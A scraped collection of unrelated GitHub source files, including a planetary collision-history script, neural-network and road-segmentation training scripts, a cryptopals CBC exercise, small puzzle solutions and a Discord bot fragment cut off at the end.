if cparam == 'all' or cparam == 'small':\n #here is where we figure out how many small collisions have happened to a body\n scoll = get_small_coll(base_dir,fdir,scoll,master_ids,mtiny[2],p)\n\n if cparam == 'all' or cparam == 'giant':\n if len(pcoll) == lp:\n if len(master_ids) == lm:\n #add a line for this id that has no collisions\n dloss = collnew['dloss'][0]\n ecc = collnew['ecc'][0]\n inc = collnew['inc'][0]\n slope = collnew['slope'][0]\n time = planets['time'][0]\n ip = np.where(planets['iinit'] == p)\n a = planets['a'][ip]\n mass = planets['mtot'][ip]\n pcoll.add_row([p,fdir,dloss,ecc,inc,slope,time,a,0,p,mass,0,0,0,0,0,\n 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0])\n elif len(master_ids) != lm:\n print('Error: pcoll same length but not master_ids')\n print(lm,len(master_ids))\n print(lp,len(pcoll))\n print(master_ids[lm-1])\n print(pcoll[lp-1])\n\n if cparam == 'all' or cparam == 'small':\n if len(scoll) == ls:\n #add a line for this id that has no collisions\n ip = np.where(planets['iinit'] == p)\n scoll.add_row([p,planets['time'][0],planets['a'][ip],0,p,planets['mtot'][ip],\n 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,p,'none'])\n\n return(pcoll,scoll)\n\ndef add_param_cols(dir_tab,scoll):\n \"\"\"Adds in simulation or directory parameter columns to scoll.\n Inputs: \n dir_tab = row of a table with directories and parameters for each directory to read in\n scoll = table of small collision histories for a directory\n \n Outputs: \n scoll = updated with directory parameters\"\"\"\n \n dir_c = Column([dir_tab['dir']]*len(scoll))\n dloss = Column([dir_tab['dloss']]*len(scoll))\n ecc = Column([dir_tab['av_ecc']]*len(scoll))\n inc = Column([dir_tab['av_inc']]*len(scoll))\n slope =Column([dir_tab['slope']]*len(scoll))\n scoll.add_column(dir_c,name='dir',index=1)\n scoll.add_column(dloss,name='dloss',index=2)\n scoll.add_column(ecc,name='ecc',index=3)\n scoll.add_column(inc,name='inc',index=4)\n scoll.add_column(slope,name='slope',index=5)\n return(scoll)\n \n\ndef get_collhist(base_dir,vtab_name,cparam,minemb,fname,fname_s,ovw,dirparam,plparam,dirtable,\n folname_min='follow.mincorecollisions-nograzefa',\n folname_max='follow.maxcorecollisions-nograzefa',\n cname_min='pl.mincorecompositions-nograzefa',cname_max='pl.maxcorecompositions-nograzefa'):\n \"\"\"Calls calc_coll_all for dirs in dirtable. Creates and writes a table for small collisions and giant collisions, depending on input.\n \n Input:\n base_dir = directory where data is\n dirtable = table of directory names and parameters that you want your table generated from\n vtab_name = table of all giant collisions\n cparam = collision size to do collhist for. Options are: 'giant','small', or 'all'\n minemb = minimum embryo mass. Options are 'embryo' or the minimum embryo mass you want.\n fname = name for giant collision history table\n fname_s = name for small collision history table\n ovw = if True, overwrite any existing files of that name\n dirparam = if 'all', do all directories and planets. if 'some', do a selection of directories and planets. If 'one', do only one directory. Planet ids must be in dirtable\n plparam = if 'some', do a selection of planet ids. If 'one', do only one planet id. Planet ids must be in dirtable \n folname_min = name of follow. file, default value is follow.mincorecollisions-nograzefa\n folname_max = name of follow. file, default value is follow.maxcorecollisions-nograzefa\n cname_min = name of comp file, default value is pl.mincorecompositions-nograzefa\n cname_max = name of comp file, default value is pl.maxcorecompositions-nograzefa\n \n Output:\n collhist = giant collision history table\n collhist_small = small collision history table\"\"\"\n \n collhist = Table(names=('pid','dir','dloss','ecc','inc','slope','time','a','iac','iap','tmass','CMFt','CMFt_min','il','ilp','pmass','CMFp','CMFp_min',\n 'itype','iLR','LRMass','CMFLR','CMFLR_min','iSLR','SLRMass','CMFSLR','CMFSLR_min','inew','ideb','mdeb',\n 'id1','id2','ctype','gamma','b','bcrit','vesc','vimp','vescalpha','veros','vcat','vsup','vhr','reveros','revsup'),\n dtype=('int64','U100','U12','float64','float64','U12','float64','float64','int64','int64','float64','float64','float64',\n 'int64','int64','float64','float64','float64','int64','int64','float64','float64','float64','int64','float64','float64','float64','int64',\n 'int64','float64','int64','int64','int64','float64','float64','float64','float64','float64','float64','float64','float64',\n 'float64','float64','float64','float64'))\n \n collhist_small = Table(names=('pid','dir','dloss','ecc','inc','slope','time','a','iac','iap','tmass','CMFt','CMFt_min',\n 'il','ilp','pmass','CMFp','CMFp_min','itype','iLR','LRMass','CMFLR','CMFLR_min',\n 'iSLR','SLRMass','CMFSLR','inew','ideb','mdeb','origin_time','origin_id'),\n dtype=('int64','U100','U12','U12','U12','U12','float64','float64','int64','int64','float64','float64',\n 'float64','int64','int64','float64','float64','float64','int64','int64','float64','float64',\n 'float64','int64','float64','float64','int64','int64','float64','float64','int64'))\n\n \n #read in table of directories and names\n #do I group both of these tables, or do I just do two separate loops for each one?\n dir_tab = Table.read(base_dir+dirtable)\n \n try:\n #read in collision information table\n vtab = Table.read(base_dir+vtab_name)\n except:\n #generate table if it doesn't exist already\n vtab = get_allvel(base_dir,dir_tab,vtab_name,True,folname_min,folname_max)\n \n if plparam == 'some':\n # add in a test to make sure there's an ids column, and exit with error if not?\n dirgrouped = dir_tab.group_by('dir')\n \n elif dirparam == 'one':\n #only get collhist for one simulation or directory \n if plparam == 'one':\n #get coll history for one planet \n pl_ids = [dirtable['iinit'][0]]\n dmask = vtab['dir'] == dirtable['dir'][0]\n pcoll,scoll = calc_coll_all(base_dir,dirtable,vtab[dmask],cparam,minemb,'some',cname_min,cname_max,pl_ids)\n elif plparam == 'some':\n #get coll history for pl_ids\n pl_ids = dirtable['iinit']\n dmask = vtab['dir'] == dirtable['dir'][0]\n pcoll,scoll = calc_coll_all(base_dir,dirtable,vtab[dmask],cparam,minemb,'some',cname_min,cname_max,pl_ids)\n elif plparam == 'all':\n dmask = vtab['dir'] == dirtable\n pcoll,scoll = calc_coll_all(base_dir,dirtable,vtab[dmask],cparam,minemb,'all',cname_min,cname_max)\n \n if dirparam == 'all':\n for i in range (0,len(dir_tab)):\n #iterate through directories in the table\n dmask = vtab['dir'] == dir_tab['dir'][i] #get velocity table for that run\n pcoll, scoll = calc_coll_all(base_dir,dir_tab['dir'][i],vtab[dmask],cparam,minemb,'all',cname_min,cname_max)\n collhist = vstack([collhist,pcoll])\n \n if cparam == 'small' or cparam == 'all':\n #add columns with init params from dir_tab\n scoll = add_params_cols(dir_tab[i],scoll)\n collhist_small = vstack([collhist_small,scoll])\n \n elif dirparam == 'some':\n for key, group in zip(dirgrouped.groups.keys, dirgrouped.groups):\n dmask = vtab['dir'] == key['dir']\n if plparam == 'some':\n #call calc_coll_all for some\n pl_ids = group['iinit']\n pcoll, scoll = calc_coll_all(base_dir,key['dir'],vtab[dmask],cparam,minemb,'some',cname_min,cname_max,pl_ids)\n collhist = vstack([collhist,pcoll])\n elif plparam == 'one':\n pl_ids = group['iinit']\n pcoll, scoll = calc_coll_all(base_dir,key['dir'],vtab[dmask],cparam,minemb,'some',cname_min,cname_max,pl_ids)\n collhist = vstack([collhist,pcoll])\n \n if cparam == 'small' or cparam == 'all':\n #add columns with init params from dir_tab\n scoll = add_params_cols(dir_tab[i],scoll)\n collhist_small = vstack([collhist_small,scoll])\n \n \n if cparam == 'giant' or cparam == 'all':\n collhist.write(base_dir+fname,format='ascii.csv',overwrite=ovw)\n if cparam == 'small' or cparam == 'all':\n collhist_small.write(base_dir+fname_s,format='ascii.csv',overwrite=ovw)\n \n if cparam == 'all':\n return(collhist,collhist_small)\n elif cparam == 'giant':\n return(collhist)\n elif cparam == 'small':\n return(collhist_small)\n","repo_name":"jscora/colltree","sub_path":"colltree/find_coll_history.py","file_name":"find_coll_history.py","file_ext":"py","file_size_in_byte":25475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29226587479","text":"# calculate nr of non bouncy numbers below 10^100\n\nfrom itertools import product\n\ndef binom(n,k):\n \"\"\" Returns binomial coefficients using multiplicative formula \"\"\"\n # http://en.wikipedia.org/wiki/Binomial_coefficient\n res = 1\n for i in range(1,k+1):\n res *= (n-i+1)/i\n\n return int(round(res,0))\n\n# 10^power is the given upper limit\npower_10 = 100\n\n# n_max: nr digits considered - 1. \n# limit 10^2 = 100 > 99 max = 2 digits, represented by lattice path 0,9 to 1,9\nn_max = power_10-1\n\n# sum all possible latice paths going up from 0.0 to 1.1, 1.2, 1.3, ..., 1.9 \nsum_up = 0\nfor i in range(1,10):\n sum_up += binom(n_max+i,i)\n\n# sum all possible paths down. \n# leading zeros are allowed vb: \n# lattice path wont come across 090 when n_ max = 3, \n# which is the same as 90 when n_max = 2\n# so n must also be summated for all smaller possible n's\nsum_down = 0\nfor n_i in product(range(1,n_max+1),range(1,10)):\n\n n, i = n_i[0], n_i[1]\n sum_down += binom(n+i,i)\n\n# doubles, all 'flat' lines in the lattice paths, vb: 1, 11, 111, 9999\n# 9 flat paths per digit, except 1,2,3,4,5,6,7,8,9 \n# but sum down starts at 2 digits so n_max works\ndoubles = 9*n_max\n\nprint(sum_up+sum_down-doubles)\n\n","repo_name":"mccornet/project_euler_2014","sub_path":"problem_113.py","file_name":"problem_113.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"20456662990","text":"# Ce fichier sert a convertir les fichiers de séquences générées sous format a2m au fichier txt se trouvant dans le dossier data/\r\n\r\nimport os\r\nfiles = os.listdir('./data_a2m/')\r\n\r\nfor filename in files:\r\n file = open('./data_a2m/'+filename,'r')\r\n if filename.split('.')[0]+'.txt' in files :\r\n continue\r\n output = ''\r\n out_line = ''\r\n lines = [line.replace('\\n','') for line in file]\r\n for line in lines[1:] :\r\n if line[0] in ['>','\\n']:\r\n output += out_line+'\\n' \r\n out_line = ''\r\n continue\r\n out_line += line\r\n file.close()\r\n file = open('./data/'+filename.split('.')[0]+'.txt','w')\r\n file.write(output)\r\n","repo_name":"abdellahrami/ClassificationRNA","sub_path":"a2m_to_txt.py","file_name":"a2m_to_txt.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"69864403666","text":"import argparse\nimport json\nimport os\nimport time\nfrom collections import defaultdict\n\nimport graphviz\n\nimport numpy as np\nimport torch\nfrom torch import optim\n\nimport tart\nimport data\nimport baselines\nfrom utils import str2bool\n\n\ndef to_model(args, num_features, num_classes):\n if args.model == 'MLP':\n return baselines.MLP(num_features, num_classes,\n num_layers=args.layers)\n elif args.model == 'TART-dense':\n return tart.make_network(num_features, num_classes,\n depth=args.depth,\n style=args.style,\n activation=args.activation,\n num_nodes=args.nodes)\n elif args.model == 'TART':\n return tart.make_tree(num_features, num_classes,\n depth=args.depth,\n decision_units=args.decision_units,\n style=args.style,\n activation=args.activation,\n window=args.window,\n leaf_layers=args.layers,\n leaf_units=args.units,\n temperature=args.temperature,\n decision_shared=args.decision_shared)\n else:\n raise ValueError(args.model)\n\n\ndef to_device(gpu):\n if torch.cuda.is_available():\n return torch.device(f'cuda:{gpu}')\n else:\n return torch.device('cpu')\n\n\ndef count_parameters(model):\n return sum(p.numel() for p in model.parameters() if p.requires_grad)\n\n\ndef update(model, device, loader, optimizer):\n model.train()\n for x, y in loader:\n x = x.to(device).view(x.size(0), -1)\n y = y.to(device)\n optimizer.zero_grad()\n loss = model.loss(x, y)\n loss.backward()\n optimizer.step()\n\n\n@torch.no_grad()\ndef evaluate(model, device, loader):\n model.eval()\n loss_sum, acc_sum, num_data = 0, 0, 0\n for x, y in loader:\n x = x.to(device).view(x.size(0), -1)\n y = y.to(device)\n loss_sum += model.loss(x, y).item() * x.size(0)\n acc_sum += torch.eq(torch.argmax(model.forward(x), dim=1), y).sum().item()\n num_data += x.size(0)\n return loss_sum / num_data, acc_sum / num_data\n\n\n@torch.no_grad()\ndef visualize(model, data_x, dir_out, device, num_samples=100):\n node_idx = defaultdict(lambda: len(node_idx) + 1)\n\n def to_node_idx(l, i):\n return str(node_idx[(l, i)])\n\n def to_width(value):\n return str(0.4 + 2.6 * value)\n\n def draw_nodes(graph_, p_list_):\n graph_.node(to_node_idx(0, 0), penwidth=to_width(1))\n for l, vec_p in enumerate(p_list_[1:]):\n for j in range(vec_p.shape[0]):\n graph_.node(to_node_idx(l + 1, j), penwidth=to_width(vec_p[j]))\n\n def draw_edges(graph_, p_list_, t_list_):\n for l, (mat_t, vec_p) in enumerate(zip(t_list_, p_list_[:-1])):\n mat_t = mat_t * vec_p\n for i in range(mat_t.shape[1]):\n for j in range(mat_t.shape[0]):\n if mat_t[j, i] > 0:\n src_idx = to_node_idx(l, i)\n dst_idx = to_node_idx(l + 1, j)\n graph_.edge(src_idx, dst_idx, penwidth=to_width(mat_t[j, i]))\n\n model.eval()\n data_x = torch.from_numpy(data_x[:num_samples, :]).to(device)\n for sample in range(data_x.size(0)):\n t_list, p_list = model.decision_path(data_x[sample].unsqueeze(0))\n t_list = [t.squeeze(0).cpu().numpy() for t in t_list]\n p_list = [p.squeeze(0).cpu().numpy() for p in p_list]\n\n graph = graphviz.Digraph(graph_attr=dict(margin=str(0.1),\n nodesep=str(0.1),\n ranksep=str(0.3)),\n node_attr=dict(width=str(0.4),\n height=str(0.4),\n fixedsize=str(True),\n style='filled'),\n edge_attr=dict(arrowhead='none'))\n\n draw_nodes(graph, p_list)\n draw_edges(graph, p_list, t_list)\n\n graph.format = 'pdf'\n graph.filename = str(sample)\n graph.directory = dir_out\n graph.render(view=False)\n os.remove(os.path.join(dir_out, str(sample)))\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n\n # Experimental settings.\n parser.add_argument('--model', type=str, required=True)\n parser.add_argument('--gpu', type=int, default=0)\n parser.add_argument('--data', type=str, default='breast-tissue')\n parser.add_argument('--fold', type=int, default=0)\n parser.add_argument('--data-path', type=str, default='../data')\n parser.add_argument('--out', type=str, default='../out')\n parser.add_argument('--save', action='store_true', default=False)\n parser.add_argument('--visualize', action='store_true', default=False)\n\n # Major model settings.\n parser.add_argument('--layers', type=int, required=True)\n parser.add_argument('--units', type=int, default=100)\n parser.add_argument('--decision-units', type=int, default=0)\n parser.add_argument('--decision-shared', type=str2bool, default=False)\n parser.add_argument('--depth', type=int, default=None)\n parser.add_argument('--nodes', type=int, default=16)\n parser.add_argument('--style', type=str, default=None)\n\n # Model settings for trees.\n parser.add_argument('--shape', type=str, default='custom')\n parser.add_argument('--window', type=int, default=2)\n parser.add_argument('--stride', type=int, default=2)\n parser.add_argument('--padding', type=int, default=0)\n parser.add_argument('--root-window', type=int, default=0)\n parser.add_argument('--temperature', type=float, default=1.)\n parser.add_argument('--activation', type=str, default='softmax')\n\n # Training settings.\n parser.add_argument('--epochs', type=int, default=200)\n parser.add_argument('--batch-size', type=int, default=1024)\n parser.add_argument('--lr', type=float, default=5e-3)\n parser.add_argument('--decay', type=float, default=0.)\n\n return parser.parse_args()\n\n\ndef check_args_validity(args):\n if args.model == 'TART':\n assert args.depth is not None\n assert args.style is not None\n\n\ndef to_out_path(args):\n if args.model == 'MLP':\n return os.path.join(args.out, f'{args.model}-{args.layers}')\n elif args.model == 'TART':\n model_name = f'{args.model}-D{args.depth}'\n if args.window > 2:\n model_name = f'{model_name}-W{args.window}'\n model_name = f'{model_name}-L{args.layers}-{args.style}'\n return os.path.join(args.out, model_name)\n else:\n raise ValueError(args.model)\n\n\ndef main():\n start_time = time.time()\n args = parse_args()\n check_args_validity(args)\n out_path = to_out_path(args)\n dataset = args.data\n device = to_device(args.gpu)\n\n fold = args.fold\n np.random.seed(fold)\n torch.manual_seed(fold)\n\n trn_x, trn_y, test_x, test_y = data.read_data(args.data_path, dataset, fold)\n num_features = trn_x.shape[1]\n num_classes = trn_y.max() + 1\n trn_loader = data.to_loader(trn_x, trn_y, args.batch_size, shuffle=True)\n test_loader = data.to_loader(test_x, test_y, args.batch_size)\n\n model = to_model(args, num_features, num_classes)\n optimizer = optim.Adam(model.parameters(), lr=args.lr, weight_decay=args.decay)\n\n log_out = os.path.join(out_path, f'logs/{dataset}/{fold}.txt')\n os.makedirs(os.path.dirname(log_out), exist_ok=True)\n with open(log_out, 'w') as f:\n f.write('epoch\\ttrn_loss\\ttrn_acc\\tis_best\\n')\n\n try:\n model = model.to(device)\n best_loss, best_epoch = np.inf, 0\n for epoch in range(args.epochs + 1):\n if epoch > 0:\n update(model, device, trn_loader, optimizer)\n trn_loss, trn_acc = evaluate(model, device, trn_loader)\n\n if trn_loss < best_loss:\n best_loss = trn_loss\n best_epoch = epoch\n\n with open(log_out, 'a') as f:\n f.write(f'{epoch:5d}\\t{trn_loss:.4f}\\t{trn_acc:.4f}\\t')\n if epoch == best_epoch:\n f.write('\\tBEST')\n f.write('\\n')\n\n _, trn_acc = evaluate(model, device, trn_loader)\n _, test_acc = evaluate(model, device, test_loader)\n\n if args.visualize:\n dir_out = os.path.join(out_path, 'graphviz', args.data, str(args.fold))\n visualize(model, test_x, dir_out, device, num_samples=100)\n\n if args.save:\n model_out = os.path.join(out_path, 'models-{}/{}.pth'.format(fold, dataset))\n os.makedirs(os.path.dirname(model_out), exist_ok=True)\n torch.save(model.state_dict(), model_out)\n\n except RuntimeError as e:\n if not str(e).startswith('CUDA out of memory.'):\n raise e\n trn_acc = -np.inf\n test_acc = -np.inf\n\n out = {arg: getattr(args, arg) for arg in vars(args)}\n out['out_path'] = out_path\n out['result'] = dict(\n trn_acc=trn_acc,\n test_acc=test_acc,\n params=count_parameters(model),\n time=time.time() - start_time)\n print(json.dumps(out))\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"leesael/TART","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9403,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"23066006030","text":"from typing import List\nclass Solution:\n def reverseString(self, s: List[str]) -> None:\n \"\"\"\n Do not return anything, modify s in-place instead.\n \"\"\"\n self.reverseRecursive(s, 0, len(s)-1)\n \n def reverseRecursive(self,s:List[str], start:int,end:int):\n if start > end:\n return\n (s[start],s[end]) = (s[end],s[start])\n self.reverseRecursive(s,start+1,end-1)\ns=Solution()\nl=[\"h\",\"e\",\"l\",\"l\",\"o\"]\nprint(s.reverseString(l))\nprint(l)","repo_name":"vasu8480/Programs-HackerRank-LeetCode-","sub_path":"Python/Leetcode/Complete Data Structures and Algorithms Software Interviews/5 Trees/Reverse String(344).py","file_name":"Reverse String(344).py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"44230353142","text":"from django.forms import Form, ModelForm, ChoiceField\n\nfrom ekozmp.apps.cart.models import CartItem\nfrom ekozmp.apps.market.models import SellerProduct\n\n\nclass AddToCartForm(ModelForm):\n\n def __init__(self, *args, **kwargs):\n # print(f'CARTFORM: \\n--object: {dir(object)}\\n-- kwargs: {kwargs}\\n-- self: {dir(self)}')\n product = kwargs.pop('product', None)\n print(f'got instance: {product}')\n super().__init__(*args, **kwargs)\n self.fields['quantity'].widget.attrs.update(stlye='width: 1em;')\n for option_name, option_values in product.options.items():\n option_tuple = [('', '')] + [(o.lower(), o) for o in option_values]\n self.fields[f'option_{option_name.lower()}'] = ChoiceField(\n choices=option_tuple,\n initial='',\n label=option_name)\n\n class Meta:\n model = CartItem\n fields = ['quantity', ]\n","repo_name":"teschmitt/ekozmp","sub_path":"ekozmp/apps/cart/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":924,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"13699060128","text":"from pico2d import *\n\nTUK_WIDTH, TUK_HEIGHT = 1280, 1024\n\n\ndef handle_events():\n global running\n global x, y\n global dir\n\n global L_R_check\n events = get_events()\n for event in events:\n if event.type == SDL_QUIT:\n running = False\n elif event.type == SDL_KEYDOWN:\n if event.key == SDLK_RIGHT:\n dir = 1\n L_R_check = 1\n elif event.key == SDLK_LEFT:\n dir = 2\n L_R_check = 2\n elif event.key == SDLK_UP:\n dir = 3\n elif event.key == SDLK_DOWN:\n dir = 4\n \n elif event.key == SDLK_ESCAPE:\n running = False\n elif event.type == SDL_KEYUP:\n if event.key == SDLK_RIGHT or SDLK_LEFT or SDLK_UP or SDLK_DOWN:\n dir = 0\n \n\n\nopen_canvas(TUK_WIDTH, TUK_HEIGHT)\nkpu_ground = load_image('TUK_GROUND.png')\ncharacter = load_image('animation_sheet.png')\n\nrunning = True\nx, y = TUK_WIDTH // 2, TUK_HEIGHT // 2\nframe = 0\nhide_cursor()\nL_R_check = 1\n\nwhile running:\n clear_canvas()\n kpu_ground.draw(TUK_WIDTH // 2, TUK_HEIGHT // 2)\n if L_R_check == 1 and dir != 0:\n character.clip_draw(frame * 100, 100 * 1, 100, 100, x, y)\n elif L_R_check == 2 and dir != 0:\n character.clip_draw(frame * 100, 100 * 0, 100, 100, x, y)\n elif L_R_check == 1 and dir == 0:\n character.clip_draw(frame * 100, 100 * 3, 100, 100, x, y)\n elif L_R_check == 2 and dir == 0:\n character.clip_draw(frame * 100, 100 * 2, 100, 100, x, y)\n\n update_canvas()\n frame = (frame + 1) % 8\n if dir == 1:\n if x < TUK_WIDTH:\n x += 5\n elif dir == 2:\n if x > 0:\n x -= 5\n elif dir == 3:\n if y < TUK_HEIGHT:\n y += 5\n elif dir == 4:\n if y > 0:\n y -= 5\n delay(0.01)\n handle_events()\n\nclose_canvas()\n\n\n\n\n","repo_name":"dennis-1215/2019180010_2DGP_DRILL","sub_path":"08/TUK_character_move.py","file_name":"TUK_character_move.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38388143810","text":"from hashlib import md5\nfrom base64 import b64decode\nfrom base64 import b64encode\nfrom Crypto.Cipher import AES\nfrom copy import deepcopy\nfrom os import urandom\nfrom random import randint\n\n\nkey = urandom(16)\n\ndef padding(block_size,s):\n tmp = len(s)%block_size\n if (tmp == 0):\n tmp = block_size\n else:\n tmp = block_size - tmp\n tmp_string = \"\"\n for i in range(tmp):\n tmp_string = tmp_string + chr(block_size)\n return s+tmp_string\n\ndef encrypt_cbc(key,m,iv = b'\\x00'*16):\n\ttmp = len(iv)\n\tm = padding(tmp,m)\n\tcipher_text = \"\"\n\tcbc_obj = AES.new(key, AES.MODE_ECB)\n\tfor i in range(0,len(m),tmp):\n\t\tsubstr = m[i:i+tmp]\n\t\txor_m = xor(substr,iv)\n\t\tiv = cbc_obj.encrypt(xor_m)\n\t\tcipher_text = cipher_text + iv\t\n\treturn cipher_text\n\n\ndef fun_1(m):\n\tprefix = 'comment1=cooking%20MCs;userdata='\n\tsuffix = ';comment2=%20like%20a%20pound%20of%20bacon'\n\tm = m.replace('=','').replace(';','').replace('%','')\n\tm = prefix + m + suffix\n\tcipher_text = encrypt_cbc(key,m)\n\treturn cipher_text\n\n","repo_name":"Singh-Rishabh/crypto_pals","sub_path":"set2/q16.py","file_name":"q16.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39006545154","text":"data = [line.strip() for line in open(\"input.txt\", 'r')]\n\ndef gcd(a,b):\n if a == 0:\n return (b, 0, 1)\n g, y, x = gcd(b % a, a)\n return (g, x - (b // a) * y ,y)\n\ndef modu(n, p):\n g, inv, y = gcd(n, p)\n assert g == 1\n return inv % p\n\ndef chinese_remainder_theorem(buses, modulo):\n x = 0\n for a, p in buses:\n n = modulo // p\n inverse = modu(n, p)\n x = (x+a*n*inverse) % modulo\n return x % modulo\n\ndeparture_time = data[0]\nvalues = data[1].split(',')\nusedVals = []\nfinalValues = []\n\nfor val in values:\n if(val != \"x\"):\n usedVals.append(val)\n\nfor val in usedVals:\n time = 0\n while(time < int(departure_time)):\n time += int(val)\n finalValues.append(time)\n\nbus = finalValues.index(min(finalValues))\n\nprint(\"Part A: \"+ str((finalValues[bus] - int(departure_time)) * int(usedVals[bus])))\n\ndef part2(buses):\n modulo = 1\n for i in buses:\n modulo *= i[1]\n return(chinese_remainder_theorem(buses, modulo))\n\npart_2 = []\nfor counter, i in enumerate(data[1].split(',')):\n if i != \"x\":\n part_2.append((-counter, int(i)))\n \nprint(\"Part B: \" + str(part2(part_2)))","repo_name":"joverandout/advent-of-code-2020","sub_path":"day13/day13.py","file_name":"day13.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14235115258","text":"'''ExecutionFilter data structure.'''\n\n__copyright__ = \"Copyright (c) 2008 Kevin J Bluck\"\n__version__ = \"$Id$\"\n\n\nclass ExecutionFilter(object):\n '''Data structure containing attributes to describe execution filter\n criteria.\n '''\n\n def __init__(self, client_id=0, acct_code=\"\", time=\"\", symbol=\"\",\n sec_type=\"\", exchange=\"\", side=\"\"):\n self.m_clientId = client_id\n self.m_acctCode = acct_code\n self.m_time = time\n self.m_symbol = symbol\n self.m_secType = sec_type\n self.m_exchange = exchange\n self.m_side = side\n\n\n def __eq__(self, other):\n if id(self) == id(other): return True\n if not isinstance(other, self.__class__): return False\n return True if (\n (self.m_clientId == other.m_clientId) and\n (self.m_acctCode.lower() == other.m_acctCode.lower()) and\n (self.m_time.lower() == other.m_time.lower()) and\n (self.m_symbol.lower() == other.m_symbol.lower()) and\n (self.m_secType.lower() == other.m_secType.lower()) and\n (self.m_exchange.lower() == other.m_exchange.lower()) and\n (self.m_side.lower() == other.m_side.lower())\n ) else False\n","repo_name":"kbluck/pytws","sub_path":"tws/_ExecutionFilter.py","file_name":"_ExecutionFilter.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"26549050248","text":"from trainer import Trainer as Trainer_clDice\nfrom trainer_dice import Trainer as Trainer_Dice\nfrom Model.model import (\n ResidualAttentionUNet,\n AttentionUNet,\n UNet,\n ResidualAttentionDuckUNet,\n ResidualAttentionDuckNetwithEncoder\n)\nfrom lion_pytorch import Lion\nfrom Dataset.dataset import ETHDataset, MassachusettsDataset, GMapsDataset \nfrom segmentation_models_pytorch.losses import DiceLoss, JaccardLoss\nfrom Loss.cldice import SoftDiceClDice\nfrom Loss.combined_loss import DiceLovaszBCELoss\nimport os\nimport torch\nimport torchvision\nimport sys\nimport click\n\n@click.command()\n@click.option(\n \"--tmpdir\",\n \"-t\",\n type=str,\n)\ndef main(tmpdir):\n sys.stdout = open(sys.stdout.fileno(), mode=\"w\", buffering=1)\n sys.stderr = open(sys.stderr.fileno(), mode=\"w\", buffering=1)\n torch.manual_seed(0)\n # base_path = \"data/ethz-cil-road-segmentation-2023\"\n # image_path = os.path.join(base_path, \"training/images\")\n # mask_path = os.path.join(base_path, \"training/groundtruth\")\n # test_dataset = ETHDataset(image_path, mask_path, augment_images=False)\n\n # dataset = MassachusettsDataset('data/archive/tiff/train', 'data/archive/tiff/train_labels', augment_images=False)\n\n base_path = os.path.join(tmpdir , \"additional_data\")\n image_path = os.path.join(base_path, \"images\")\n mask_path = os.path.join(base_path, \"masks\")\n skeleton_path = os.path.join(base_path, \"skel\")\n dataset = GMapsDataset(\n image_path,\n mask_path,\n skel_path=skeleton_path,\n augment_images=True,\n #normalize=True,\n )\n\n model = ResidualAttentionDuckNetwithEncoder(3, 1)\n #model.load_state_dict(torch.load('best_model_weights_pretrained_clDice_duck_final.pth'))\n\n loss_fn = SoftDiceClDice(0.5) #DiceLovaszBCELoss(alpha=0.5, beta=0.3, gamma=0.2)\n optimizer = Lion(model.parameters(), lr=1e-4, weight_decay=1e-6)\n trainer = Trainer_clDice(\n model,\n dataset,\n None,\n loss_fn,\n optimizer,\n split_test=0.2,\n batch_size=16,\n epochs=30,\n test_metrics=[DiceLoss(mode=\"binary\"), JaccardLoss(mode=\"binary\")],\n test_metric_names=[\"DiceLoss\", \"JaccardLoss\"],\n epochs_between_safe=1,\n name=\"our_model_cl_dice_pretrained\",\n \n )\n scores = trainer.train_test()\n scores.to_csv(\"our_model_cl_dice_pretrain.csv\")\n\n base_path = \"data/ethz-cil-road-segmentation-2023\"\n image_path = os.path.join(base_path, \"training/images\")\n mask_path = os.path.join(base_path, \"training/groundtruth\")\n dataset = ETHDataset(image_path, mask_path, augment_images=False)\n\n loss_fn = DiceLoss(mode=\"binary\")\n optimizer = Lion(model.parameters(), lr=1e-5, weight_decay=1e-6)\n trainer = Trainer_Dice( \n model,\n dataset,\n None,\n loss_fn,\n optimizer,\n split_test=0.2,\n batch_size=16,\n epochs=30,\n test_metrics=[DiceLoss(mode=\"binary\"), JaccardLoss(mode=\"binary\")],\n test_metric_names=[\"DiceLoss\", \"JaccardLoss\"],\n epochs_between_safe=1,\n name=\"our_model_cl_dice\", \n )\n\n scores = trainer.train_test()\n scores.to_csv(\"our_model_cl_dice.csv\")\n\n\n\nif __name__ == \"__main__\": # use line-buffering for both stdout and stderr\n main()\n","repo_name":"ywattenberg/road_segmentation","sub_path":"src/train_our_model.py","file_name":"train_our_model.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15440633525","text":"import argparse\nimport sys\nimport io\n\nfrom api.betting import BettingHandler\nfrom api.config import Config\nfrom api.database import Database\nfrom api.bets import get_betting_handler\nfrom discbot.discord_bot import DiscordClient\nfrom api.util import GUILD_MAP, SUPPORTED_GAMES\n\nCHANNEL_MAP = {\n \"nibs\": 730744358751567902,\n \"circus\": 805218121610166272,\n \"core\": 808796236692848650,\n \"test\": 512363920044982274\n}\n\nasync def 